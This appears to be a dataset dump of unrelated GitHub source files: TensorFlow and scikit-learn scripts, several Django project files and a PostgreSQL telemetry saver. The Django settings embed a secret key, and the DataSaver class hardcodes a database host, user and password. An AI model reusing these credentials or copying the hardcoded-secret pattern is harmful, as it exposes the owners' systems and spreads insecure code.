type=float,
default=0.001,
help="Learning rate of optimizer (if supported).")
add('--loss',
type=lambda s: s.lower(),
default='l1',
help="Loss function used by model during training (if supported).")
add('--momentum',
type=float,
default=0.01,
help="Momentum value used by optimizer (if supported).")
add('--decay',
type=float,
default=0.9,
help="Decay value used by optimizer (if supported).")
add('--centered',
default=False,
action='store_true',
help="Enables centering in RMSProp optimizer.")
add('--beta1',
type=float,
default=0.9,
help="Value for optimizer's beta_1 (if supported).")
add('--beta2',
type=float,
default=0.999,
help="Value for optimizer's beta_2 (if supported).")
# model settings
add = model_args.add_argument
add('--model',
type=lambda s: s.lower(),
default='fc',
help="Name of model to train.")
add('--latent_size',
type=int,
default=200,
help="""Size of middle 'z' (or latent) vector to use in autoencoder
models (if supported).""")
# data/pipeline settings
add = data_args.add_argument
add('--dataset',
type=lambda s: s.lower(),
default='floorplans',
help="Name of dataset to use. Default: floorplans.")
add('--resize',
type=int,
nargs=2,
help="""Resize input images to size w x h. This argument, if specified,
requires two values (width and height).""")
add('--shuffle',
default=True,
action='store_true',
help="""Set this to shuffle the dataset every epoch.""")
add('--buffer_size',
type=int,
default=10000,
help="""Size of the data buffer.""")
add('--grayscale',
default=False,
action='store_true',
help="Converts input images to grayscale.")
add('--cache_dir',
default=None,
help="""Cache dataset to the directory specified. If not provided,
will attempt to cache to memory.""")
args = parser.parse_args()
# set up model, data, and training environment
######################################################################
# set seed (useful for debugging purposes)
if args.seed is None:
args.seed = os.urandom(4)
random.seed(args.seed)
# init globals
message('Parsing options...')
with tf.device('/cpu:0'):
global_step = tf.Variable(0, trainable=False, name='global_step')
global_epoch = tf.Variable(0, trainable=False, name='global_epoch')
increment_global_epoch = tf.assign(global_epoch, global_epoch+1)
# save options to disk for later reference
if not os.path.exists(args.dir):
os.makedirs(args.dir)
f = open(os.path.join(args.dir, 'options.config'), 'w')
for a in vars(args):
v = getattr(args, a)
f.write('{} {}\n'.format(a, v))
print(' {} = {}'.format(a, v))
f.close()
# input pipeline
message('Initializing input pipeline...')
with tf.variable_scope('input_pipeline'):
x, x_init, x_count = get_dataset(args)
# x, x_count = get_dataset(args)
if args.epoch_size <= 0:
iter_per_epoch = int(x_count / (args.batch_size * args.n_gpus))
else:
iter_per_epoch = args.epoch_size
if args.resize:
message(' Resizing images to {}.'.format(args.resize))
x = tf.image.resize_images(x, args.resize)
if args.grayscale:
message(' Converting images to grayscale.')
x = tf.image.rgb_to_grayscale(x)
# setup model
message('Initializing model...')
# models should return a 2-tuple (f, s) where f is a training
# function that runs one step (or batch) of training and s is a
# summary op containing all summaries to run.
model_funcs = {'gan' : gan,
'wgan' : gan,
'iwgan': gan,
'vae' : vae,
'cnn' : cnn}
train_func = model_funcs[args.model](x, args)
summary_op = merge_all_summaries()
# supervisor
message('Initializing supervisor...')
init_op = tf.group(tf.global_variables_initializer(),
tf.local_variables_initializer())
sv = tf.train.Supervisor(logdir = args.dir,
init_op = init_op,
summary_op = None,
global_step = global_step,
save_model_secs = 0,
saver = tf.train.Saver(max_to_keep=0, name='saver'))
# profiling (optional)
# requires adding libcupti.so.8.0 (or equivalent) to LD_LIBRARY_PATH.
# (location is /cuda_dir/extras/CUPTI/lib64)
run_options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE) if args.profile else None
run_metadata = tf.RunMetadata() if args.profile else None
# training
######################################################################
session_config = tf.ConfigProto(allow_soft_placement=True)
with sv.managed_session(config=session_config) as sess:
# initialize
start_time = time.time()
save_path = os.path.join(args.dir, 'checkpoint')
current_step = int(sess.run(global_step))
current_epoch = int(sess.run(global_epoch))
if args.epochs[0] == '+':
max_epochs = current_epoch + int(args.epochs[1:])
else:
max_epochs = int(args.epochs)
status = None
sess.run(x_init)
# save model params before any training has been done
if current_step == 0:
message('Generating baseline summaries and checkpoint...')
# sess.run(x_init)
sv.saver.save(sess, save_path=save_path, global_step=global_step)
sv.summary_computed(sess, sess.run(summary_op))
message('Starting training...')
for epoch in range(current_epoch, max_epochs):
# sess.run(x_init)
# -1 to save 1 batch for summaries at end
pbar = tqdm(range(iter_per_epoch), desc='Epoch {:3d}'.format(epoch+1), unit='batch')
for i in pbar:
if sv.should_stop():
print('stopping1')
break
else:
# train and display status
prev_status = status
status = train_func(sess, args)
pbar.set_postfix(format_for_terminal(status, prev_status))
# record 10 extra summaries (per epoch) in the first 3 epochs
if epoch < 3 and i % int((iter_per_epoch / 10)) == 0:
sv.summary_computed(sess, sess.run(summary_op))
# # and record a summary half-way through each epoch after that
elif epoch >= 3 and i % int((iter_per_epoch / 2)) == 0:
sv.summary_computed(sess, sess.run(summary_op))
if sv.should_stop():
print('stopping2')
break
sess.run(increment_global_epoch)
# sess.run(tf.assign(global_epoch, global_epoch+1))
current_epoch = int(sess.run(global_epoch))
# print('completed epoch {}'.format(current_epoch))
# generate summaries and checkpoint
sv.summary_computed(sess, sess.run(summary_op))
sv.saver.save(sess, save_path=save_path, global_step=global_epoch)
# print('generated summaries and checkpoint')
message('\nTraining complete! Elapsed time: {}s'.format(int(time.time() - start_time)))
| [
"pls@algoterranean.com"
] | pls@algoterranean.com |
cc0d10e49221d788586d5696bbc4acaac89f2349 | 5cc4679bb1680427dc8b14572f9679ca8cb8eb3a | /wth_home/wth_home/settings.py | 6826312a7ca46a6c40db2f0df279dfceee47e7ce | [] | no_license | seahyc/wth-home | 47406ef801c1c9d34c608e5a757b2089b9c2bf19 | 58443614c3f071ac75f0b89a42cc9f9644d8378d | refs/heads/master | 2020-04-05T18:57:02.600138 | 2014-10-09T00:03:12 | 2014-10-09T00:03:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,048 | py | """
Django settings for wth_home project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'zpnlcw*4_q85upf7&ndqyy&i$!-hprr$2l48s^zn9$@kql*nw7'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'wth_home.urls'
WSGI_APPLICATION = 'wth_home.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
| [
"snowboarderwv@Raghav-Joshis-MacBook-Pro.local"
] | snowboarderwv@Raghav-Joshis-MacBook-Pro.local |
dd1ad825046444e8fd52923491bfcc23d5075f01 | c249f6a46ae5f20669b8db87bf0dc5bae49e6770 | /Brandless/accounts/form.py | 4a0030bd782fc3c99e4bca4c9b515d0e4f60805e | [] | no_license | arjuntsaji/Django-crud-operations-miniproject | 390715fb0f5faed9e26f4cfb9dbf8916e2de4d0d | c1a193e5a80cfb3ac64e7c3ebdd9ae4bd43be833 | refs/heads/master | 2023-05-14T20:29:31.609820 | 2021-06-06T04:42:46 | 2021-06-06T04:42:46 | 348,951,368 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 708 | py | from django import forms
from accounts.models import Employees
class EmployeeForm(forms.ModelForm):
class Meta:
model=Employees
fields = "__all__"
labels={
"first_name":"First Name",
"last_name": "Last Name",
"emp_id": "Emp Id",
"typeofwork":"Type of Work",
"position":"Position Level",
"resume_file":"Upload Resume"
}
def __init__(self, *args, **kwargs):
super(EmployeeForm, self).__init__(*args,**kwargs)
self.fields["position"].empty_label = "Select"
self.fields["department"].empty_label = "Select"
self.fields["typeofwork"].empty_label = "Select"
| [
"arjuntsaji24@gmail.com"
] | arjuntsaji24@gmail.com |
f55d8e0a0e7b71e66374c7a1965cc486396cfd89 | c37a379a705503d2d1e1a9ae21c848e1fc7e1e0c | /HTTPager/wsgi.py | 6cc21ac5f1fc16832dbef4705ed74cdadf640fc6 | [
"MIT"
] | permissive | alexandres/HTTPager | 500ffe2515cf76b68d6b62810f9106398c2b7d8e | 88fbc824727ce7afcd81eaba998cfa2af8e4165f | refs/heads/master | 2023-01-27T22:36:23.748761 | 2020-11-07T12:11:42 | 2020-11-07T12:11:42 | 204,201,626 | 6 | 0 | null | null | null | null | UTF-8 | Python | false | false | 393 | py | """
WSGI config for HTTPager project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'HTTPager.settings')
application = get_wsgi_application()
| [
"outroalex@gmail.com"
] | outroalex@gmail.com |
ecabc3dcb10145b83bbb80f262734d974703a141 | 49860fb1b74a4d335ed0931dc42f68fb4b540ab7 | /env/bin/easy_install-3.7 | fda23799d06ca0e9bbc56983d8690b34ca37d3a6 | [] | no_license | noamgrinch/ShortenURL | ffc061ebd9e45e9a08cb22c77f16a65965bbc8b2 | aae0ecfa3142478ae6db9d392378007139aaab8b | refs/heads/master | 2020-09-07T07:41:34.235824 | 2019-11-18T12:43:45 | 2019-11-18T12:43:45 | 220,707,409 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 269 | 7 | #!/home/noam/PycharmProjects/ShortenURL/env/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"noamgrinch@gmail.com"
] | noamgrinch@gmail.com |
ae07986f3afe90f68fb0409edab1c246bf2f39c5 | d060a9672cddc61ea44bcabf933eaecb98864d1e | /Linear regression.py | 978c596bc5a7b5b464791a454e12abe02a611240 | [] | no_license | prashant1423/Project_AML_A1_Python | a3c20c58ac4d07781dc9a47c52f142fd249db181 | 2eb54e63ed24b0fb44557cbfac56054349e56d32 | refs/heads/master | 2020-07-02T09:51:13.215623 | 2016-12-01T17:03:56 | 2016-12-01T17:03:56 | 74,312,269 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,946 | py |
import numpy as np
import matplotlib.pyplot as plt
from itertools import product
from scipy.stats import norm
from scipy.stats import multivariate_normal
def plotPrior(number):
#linspace will create a row vector equally spaced between -2 and 2
w0 = np.linspace(-2.0, 2.0, num=number)
w1 = np.linspace(-2.0, 2.0, num=number)
#meshgrid arrange all comibinations of x and y
X, Y = np.meshgrid(w0, w1)
N, M = len(X), len(Y)
#fill with zero matrix
Z = np.zeros((N, M))
#product - cartesian product wo and w1
for i,(x,y) in enumerate(product(w0,w1)):
#hstack - horizontally arrange as stack of arrays
pos = np.hstack((x, y))
Z[np.unravel_index(i, (N,M))] = multivariate_normal([0, 0], [[0.3,0],[0,0.3]]).pdf(pos)
im = plt.imshow(Z,cmap='jet',extent=(-2, 2, -2, 2))
ax = plt.gca()
ax.grid(False)
plt.xlabel('w1')
plt.ylabel('w0')
plt.show()
def computeLikelihood(number, xi, yi, posterior = None):
w0 = np.linspace(-2.0, 2.0, num=number)
w1 = np.linspace(-2.0, 2.0, num=number)
X, Y = np.meshgrid(w0, w1)
N, M = len(X), len(Y)
Z = np.zeros((N, M))
for i,(x,y) in enumerate(product(w0,w1)):
pos = np.hstack((x, y))
if posterior is None:
Z[np.unravel_index(i, (N,M))] = norm(x*xi + y, np.sqrt(0.3)).pdf(yi) * multivariate_normal([0, 0], [[0.3,0],[0,0.3]]).pdf(pos)
else :
Z[np.unravel_index(i, (N,M))] = norm(x*xi + y, np.sqrt(0.3)).pdf(yi) * posterior[i]
Z= np.reshape(Z,10000)
indices = np.argsort(Z)[::-1][:20]
Wsamples =[]
for i,(x,y) in enumerate(product(w0,w1)):
for j, index in enumerate(indices):
if i == index :
Wsamples.append((x,y))
return Z, Wsamples
def plotSamples(W):
x = np.arange(-1.0, 1.0, 0.1)
#y = np.arange(-1.0, 1.0, 0.1)
fig = plt.figure()
#plt.ylim(-1.0, 1.0)
ax = plt.gca()
ax.grid(False)
for (w0,w1) in W:
plt.plot(x,w0*x+w1)
plt.xlabel('x1')
plt.ylabel('y')
plt.show()
def plotLikelihood(Z):
Z= np.reshape(Z,(100,100))
im = plt.imshow(Z,cmap='jet',extent=(-2, 2, -2, 2))
plt.xlabel('w1')
plt.ylabel('w0')
ax = plt.gca()
ax.grid(False)
# plt.show()
def plotPosterior():
x, y = np.mgrid[-1:1:.01, -1:1:.01]
pos = np.dstack((x, y))
rv = multivariate_normal([0.5, -0.2], [[2.0, 0.3], [0.3, 0.5]])
fig2 = plt.figure()
ax2 = fig2.add_subplot(111)
ax2.contourf(x, y, rv.pdf(pos), cmap='jet')
# plt.show()
def plotNormal2D(X,fid):
nbins = 200
H, xedges, yedges = np.histogram2d(X[:,0],X[:,1],bins=nbins)
H = np.rot90(H)
H = np.flipud(H)
Hmasked = np.ma.masked_where(H==0,H)
fig = plt.figure(fid)
plt.pcolormesh(xedges,yedges,Hmasked, cmap='jet')
plt.ylim([-3,3])
plt.xlim([-3,3])
#plt.axis([-5,5,-5,5])
plt.show()
def pickDataPoint(w0,w1,sigma,mu):
#sample from unif(-1,1)
x = round(2 * np.random.random_sample() -1 ,2)
sigma = np.sqrt(sigma)
#epsilon = N(mu,sigma)
epsilon = sigma * np.random.randn() + mu
y = w0*x + w1 + epsilon
return(x,y)
def posteriorDistribution(prevPosterior , likelihood):
for i, y in enumerate(likelihood):
prevPosterior[i] = y * prevPosterior[i]
return prevPosterior
# visualise the prior over W
#kPrior = [[0.3,0],[0,0.3]]
#muPrior = [0, 0]
N = 1000000
#plot prior
#(prior,1)
#parameters
w0 = -1.3
w1 = 0.5
sigma = 0.3
mu = 0
#pick first point
#for i in enumerate (N,M)
#psi =
#beta = 1/0.3
#priormean = sigma*((linang.inv(sigma)*mean)+beta)
#priorsigma =
plotPrior(102)
x, y = pickDataPoint(w0,w1,sigma,mu)
Z, W = computeLikelihood(100, x,y)
plotSamples(W)
plotLikelihood(Z)
for i in range(25):
x1, y1 = pickDataPoint(w0,w1,sigma,mu)
Z,W = computeLikelihood(100, x1, y1, Z)
if i==1:
plotSamples(W)
plotLikelihood(Z)
plotSamples(W)
plotLikelihood(Z)
| [
"noreply@github.com"
] | prashant1423.noreply@github.com |
13c72c87f0de714a1c41044ac29c993127faf709 | ab4fdc0bd9ae28944e8e03f07407e7f102f5f876 | /knnclassifier (1).py | 63413ca635056b6d1ec9c0c5e8a5e18de13a760e | [] | no_license | sunnyk-code/MachineLearningAlgorithms | 2a3233cb5f2ca315673d38d5c316d03fa688ca55 | 53fed502503bb44d708cad6caf26c46d019b234c | refs/heads/master | 2022-11-02T10:27:47.485377 | 2020-06-16T16:27:42 | 2020-06-16T16:27:42 | 267,741,979 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,612 | py | # -*- coding: utf-8 -*-
"""KNNClassifier.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1UuiMkG_dmgC6zyv5E5bCt8fZEDT-Yn5Z
"""
# Commented out IPython magic to ensure Python compatibility.
import itertools
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.ticker import NullFormatter
import pandas as pd
import numpy as np
import matplotlib.ticker as ticker
from sklearn import preprocessing
# %matplotlib inline
#Import data from IBM Storage (Telecommunications service customer classification)
!wget -O teleCust1000t.csv https://s3-api.us-geo.objectstorage.softlayer.net/cf-courses-data/CognitiveClass/ML0101ENv3/labs/teleCust1000t.csv
df = pd.read_csv("teleCust1000t.csv")
df.head()
# num in each class
df['custcat'].value_counts()
df.hist(column = 'income' , bins = 70)
df.columns
toNP = df[['region', 'tenure', 'age', 'marital', 'address', 'income', 'ed','employ', 'retire', 'gender', 'reside', 'custcat']].values
toNP[0:5]
yVals = df['custcat'].values
yVals[0:5]
toNP = preprocessing.StandardScaler().fit(toNP).transform(toNP.astype(float))
toNP[0:5]
from sklearn.model_selection import train_test_split
x_train, x_test, y_train, y_test = train_test_split(toNP, yVals, test_size = 0.2, random_state = 6 )
print ('Train set:' , x_train.shape , y_train.shape)
print('Test set: X:' , x_test.shape , y_test.shape)
#Import Classification Methods
from sklearn.neighbors import KNeighborsClassifier
k = 6
neigh = KNeighborsClassifier(k).fit(x_train, y_train)
neigh
yhat = neigh.predict(x_test)
print(yhat[0:5], '--------------------------------------------------', x_test[0:5])
from sklearn import metrics
print("Train set Accuracy: ", metrics.accuracy_score(y_train, neigh.predict(x_train)))
print("Test set Accuracy: ", metrics.accuracy_score(y_test, yhat))
Ks = 10
mean_acc = np.zeros((Ks-1))
std_acc = np.zeros((Ks-1))
ConfustionMx = [];
for n in range(1,Ks):
#Train Model and Predict
neigh = KNeighborsClassifier(n_neighbors = n).fit(x_train,y_train)
yhat=neigh.predict(x_test)
mean_acc[n-1] = metrics.accuracy_score(y_test, yhat)
std_acc[n-1]=np.std(yhat==y_test)/np.sqrt(yhat.shape[0])
mean_acc
plt.plot(range(1,Ks),mean_acc,'g')
plt.fill_between(range(1,Ks),mean_acc - 1 * std_acc,mean_acc + 1 * std_acc, alpha=0.10)
plt.legend(('Accuracy ', '+/- 3xstd'))
plt.ylabel('Accuracy ', color = 'blue')
plt.xlabel('Number of Neighbors (K)', color = 'blue')
plt.tight_layout()
plt.show()
print( "The best accuracy was with", mean_acc.max(), "with k=", mean_acc.argmax()+1) | [
"noreply@github.com"
] | sunnyk-code.noreply@github.com |
dd7d5ffd806027eeac8ec30be404c3f5669a2385 | 834579a021bf6e8c80b6e914c47a726216fb34a8 | /account/migrations/0008_img.py | afeaebe3224ff16518fa793746b2814d7d0aee59 | [] | no_license | HawkinYap/CertificateConsultingandDecision-master | 1ff11012506b87f9d4e55d8453817d52b5df757b | 1aa2d9e167b408dbe97708d882d94087b391a3c9 | refs/heads/master | 2020-05-02T19:51:04.767195 | 2019-08-26T06:56:04 | 2019-08-26T06:56:04 | 178,171,306 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 709 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('account', '0007_remove_userinfo_photo'),
]
operations = [
migrations.CreateModel(
name='IMG',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('img', models.ImageField(upload_to=b'img')),
('user', models.OneToOneField(to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"1316918731@qq.com"
] | 1316918731@qq.com |
53ea51c73541062296a7f58aae02ba7035d7bacd | 9f9faf88da84efe7208020c46d763b79a5be9c51 | /flight_recorder_v2/DBSaver.py | 6b0c150f80785a77c451410ccd570f28547b6ea2 | [] | no_license | imaxus/pite | e759c3c62638afff9fe3c9b914f5cc9f3b92fa5a | 679ff6735833b2bd7c57754bed24f446b4e97a4c | refs/heads/master | 2021-01-21T11:39:24.995718 | 2016-05-25T13:51:41 | 2016-05-25T13:51:41 | 53,480,453 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,539 | py | import psycopg2
#TODO: przerobic tak zeby obslugiwal odpowiednie dane
class DataSaver:
    """Persist formatted flight telemetry into a PostgreSQL database.

    ``save_data`` expects samples laid out as
    [speed, alt, climb, direction, banking, fuel].

    NOTE(review): the original (Polish) docstring described the format as
    [time, speed, alt, climb, direction, banking] with time in seconds since
    take-off, but ``save_data`` indexes the list speed-first and never
    updates ``self.time`` -- confirm the intended schema with callers.
    """

    def __init__(self, conn):
        """
        :param conn: an open psycopg2 connection used for all INSERTs
        """
        self.conn = conn
        # Last-seen value of each telemetry channel; updated by the save_* setters.
        self.speed = 0
        self.alt = 0
        self.climb = 0
        self.direction = 0
        self.banking = 0
        self.fuel = 0
        self.time = 0

    def save_data(self, data):
        """Store one telemetry sample in the ``flight`` table.

        :param data: sequence [speed, alt, climb, direction, banking, fuel]
        :return: True on success, False if the INSERT failed
        """
        self.save_speed(data[0])
        self.save_alt(data[1])
        self.save_climb(data[2])
        self.save_dir(data[3])
        self.save_bank(data[4])
        self.save_fuel(data[5])
        # NOTE(review): ``fuel`` is captured but never inserted, while
        # ``time`` is inserted but never updated -- confirm intent.
        cur = self.conn.cursor()
        try:
            # Parameterized query (was %-string interpolation): the driver
            # handles quoting/escaping, avoiding malformed SQL for odd values.
            cur.execute(
                'INSERT INTO flight (speed,alt,climb,direction,banking,time) '
                'VALUES (%s, %s, %s, %s, %s, %s);',
                (self.speed, self.alt, self.climb,
                 self.direction, self.banking, self.time))
            self.conn.commit()
            cur.close()
        except Exception:
            # Was a bare ``except:``; narrowed so KeyboardInterrupt and
            # SystemExit are no longer swallowed.
            print("there was an error during data sending")
            return False
        return True

    def save_speed(self, sp):
        self.speed = sp

    def save_alt(self, alt):
        self.alt = alt

    def save_climb(self, climb):
        self.climb = climb

    def save_dir(self, dire):
        self.direction = dire

    def save_bank(self, bank):
        self.banking = bank

    def save_fuel(self, ful):
        self.fuel = ful

    @staticmethod
    def connect_to_db():
        """Open a connection to the flight-recorder database.

        :return: a psycopg2 connection; terminates the process on failure
        """
        try:
            # NOTE(review): hard-coded credentials -- move to configuration
            # or environment variables before any wider deployment.
            conn = psycopg2.connect("dbname='pg23138_flight_recorder' user='pg23138_flight_recorder'"
                                    " host='23138.p.tld.pl' password='flight4Reco'")
        except Exception:
            print("I am unable to connect to the database")
            quit()
        return conn

    @staticmethod
    def debug_mode_no_internet():
        # Stub used when no network/database is available.
        return 0
| [
"kubek633@o2.pl"
] | kubek633@o2.pl |
d3c10c698576a40dea5ac7270011a9b5bec8be8d | d4a9e76fee70263af0c3bee4c6135578d71909e7 | /pdp_django/pdp_django/urls.py | 53e1b7498c08fd22da9d118b1d461431e7c507be | [] | no_license | minov87/test-develop | 3bd18fdbdf605bf25b3e91f887c4783d386bff9a | 74f245bb6f0405afea1b84ccb8278ae8711fe316 | refs/heads/master | 2021-01-20T14:53:43.765149 | 2017-05-25T10:30:42 | 2017-05-25T10:30:42 | 82,784,672 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,687 | py | """pdp_django URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/dev/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import include, url
from django.contrib import admin
from django.conf.urls.static import static
from django.conf import settings
from pdp_django.views import *
# Route table: site apps, auth, registration, admin; static()/media served
# by Django itself (insecure=True forces this even when DEBUG is off --
# development convenience only, not for production).
urlpatterns = [
    url(r'^$', HomeView.as_view(), name='home'),
    url(r'^bookmark/', include('bookmark.urls', namespace='bookmark')),
    url(r'^blog/', include('blog.urls', namespace='blog')),
    url(r'^photo/', include('photo.urls', namespace='photo')),
    url(r'^accounts/', include('django.contrib.auth.urls')),
    url(r'^accounts/register/$', UserCreateView.as_view(), name='register'),
    url(r'^accounts/register/done/$', UserCreateDoneTV.as_view(), name='register_done'),
    url(r'^admin/', admin.site.urls),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT, insecure=True) + static(settings.ASSETS_URL, document_root=settings.ASSETS_ROOT, insecure=True)
# Custom error views for the standard HTTP error handlers.
handler400 = 'pdp_django.views.custom_400'
handler403 = 'pdp_django.views.custom_403'
handler404 = 'pdp_django.views.custom_404'
handler500 = 'pdp_django.views.custom_500'
"minov87@gmail.com"
] | minov87@gmail.com |
10ffffb93ae671078733071d91f6ea745749d061 | 250f58a420b56576c610030d133765de58bf602d | /GaussianNB_Deployment/class_vis.py | e8516ef52d1443b2496db46f963eb1da146c0369 | [] | no_license | SantoshGowrisetty/MachieLearning | 0881c400556b5bf75b1b29e229dfd29c7180a575 | 05b33a45bb43adbb6079b03bf013e67535a51e7c | refs/heads/master | 2021-01-11T14:14:31.406180 | 2017-02-07T16:34:36 | 2017-02-07T16:34:36 | 81,226,911 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,771 | py | #!/usr/bin/python
import warnings
warnings.filterwarnings("ignore")
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
import pylab as pl
import numpy as np
#import numpy as np
#import matplotlib.pyplot as plt
#plt.ioff()
def prettyPicture(clf, X_test, y_test):
    """Plot clf's decision boundary over [0,1]x[0,1] together with the test
    points and save the figure to 'test.png'.

    :param clf: fitted classifier exposing ``predict``
    :param X_test: 2-D test features; column 0 is plotted as x ("bumpiness"),
        column 1 as y ("grade")
    :param y_test: binary labels -- 0 is drawn blue/"fast", 1 red/"slow"
    """
    x_min = 0.0; x_max = 1.0
    y_min = 0.0; y_max = 1.0
    # Plot the decision boundary. For that, we will assign a color to each
    # point in the mesh [x_min, m_max]x[y_min, y_max].
    h = .01 # step size in the mesh
    xx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h))
    # Predict a class for every mesh point, then reshape back to the grid.
    Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])
    # Put the result into a color plot
    Z = Z.reshape(xx.shape)
    plt.xlim(xx.min(), xx.max())
    plt.ylim(yy.min(), yy.max())
    plt.pcolormesh(xx, yy, Z, cmap=pl.cm.seismic)
    # Plot also the test points, split by class label.
    grade_sig = [X_test[ii][0] for ii in range(0, len(X_test)) if y_test[ii]==0]
    bumpy_sig = [X_test[ii][1] for ii in range(0, len(X_test)) if y_test[ii]==0]
    grade_bkg = [X_test[ii][0] for ii in range(0, len(X_test)) if y_test[ii]==1]
    bumpy_bkg = [X_test[ii][1] for ii in range(0, len(X_test)) if y_test[ii]==1]
    plt.scatter(grade_sig, bumpy_sig, color = "b", label="fast")
    plt.scatter(grade_bkg, bumpy_bkg, color = "r", label="slow")
    plt.legend()
    plt.xlabel("bumpiness")
    plt.ylabel("grade")
    plt.savefig("test.png")
import base64
import json
import subprocess
def output_image(name, format, bytes):
    """Emit an image as a base64/JSON payload between sentinel markers on stdout.

    NOTE(review): Python 2 only -- uses the ``print`` statement and
    ``base64.encodestring`` (removed in Python 3.9). The ``format`` and
    ``bytes`` parameters shadow builtins of the same name.
    """
    # Sentinels let a downstream consumer locate the payload in mixed output.
    image_start = "BEGIN_IMAGE_f9825uweof8jw9fj4r8"
    image_end = "END_IMAGE_0238jfw08fjsiufhw8frs"
    data = {}
    data['name'] = name
    data['format'] = format
    data['bytes'] = base64.encodestring(bytes)
    print image_start+json.dumps(data)+image_end
| [
"gowrisettysantosh@gmail.com"
] | gowrisettysantosh@gmail.com |
c974282ddec5ca8fae37bd2db65aaa0496018c4d | 0787465a164633ea29c9db369d6019b2a2362b55 | /PrimeTest.py | 8430c954bb18cb9cc74878e87a7b4f0ac8e40938 | [
"MIT"
] | permissive | ReenExeCubeTime/CodewarsPython | 48a97df561098e60f169c923390b2c03b3b2da42 | 5c6ad4e7566503a0adaf430df9b7635a3f94d396 | refs/heads/master | 2021-01-17T09:46:40.400447 | 2017-03-22T22:07:47 | 2017-03-22T22:07:47 | 83,992,852 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 294 | py | import unittest
from Prime import Prime
class PrimeTest(unittest.TestCase):
    """Unit tests for Prime.backwards.

    NOTE(review): the expected lists are subsets of the primes in each range
    (e.g. 9901, 9907, 9929 are absent from [9900, 10000]), so ``backwards``
    presumably returns primes whose digit reversal is also prime -- confirm
    against the Prime implementation.
    """
    def test(self):
        prime = Prime()
        self.assertEqual(prime.backwards(9900, 10000), [9923, 9931, 9941, 9967])
        self.assertEqual(prime.backwards(7000, 7060), [7027, 7043, 7057])
unittest.main()
"ipourri@gmail.com"
] | ipourri@gmail.com |
8eb2a53258c8e49c96d2de318c78f58c998f0730 | 6c2f62ee8759a36b3117a469bf947173e033e483 | /homework2a.py | e378d0e0c0f6e963154804391fc6fea74b6035da | [] | no_license | Micah-Zhang/CSCI_2824_Discrete_Structures | e4550fc6d2a0174d06a8d8c08a988aff7d65d311 | 698870a12513444c2a9e23345630d2eec85b3b5a | refs/heads/master | 2021-01-25T13:59:00.695914 | 2018-03-02T22:17:05 | 2018-03-02T22:17:05 | 123,636,505 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 186 | py | def tarski(shapes,colors):
for i in range(len(colors)):
for j in range(len(colors)):
if colors[i][j] == 'gray':
if not shapes[i][j] == 'circle':
return False
return True
| [
"micah.zhang@colorado.edu"
] | micah.zhang@colorado.edu |
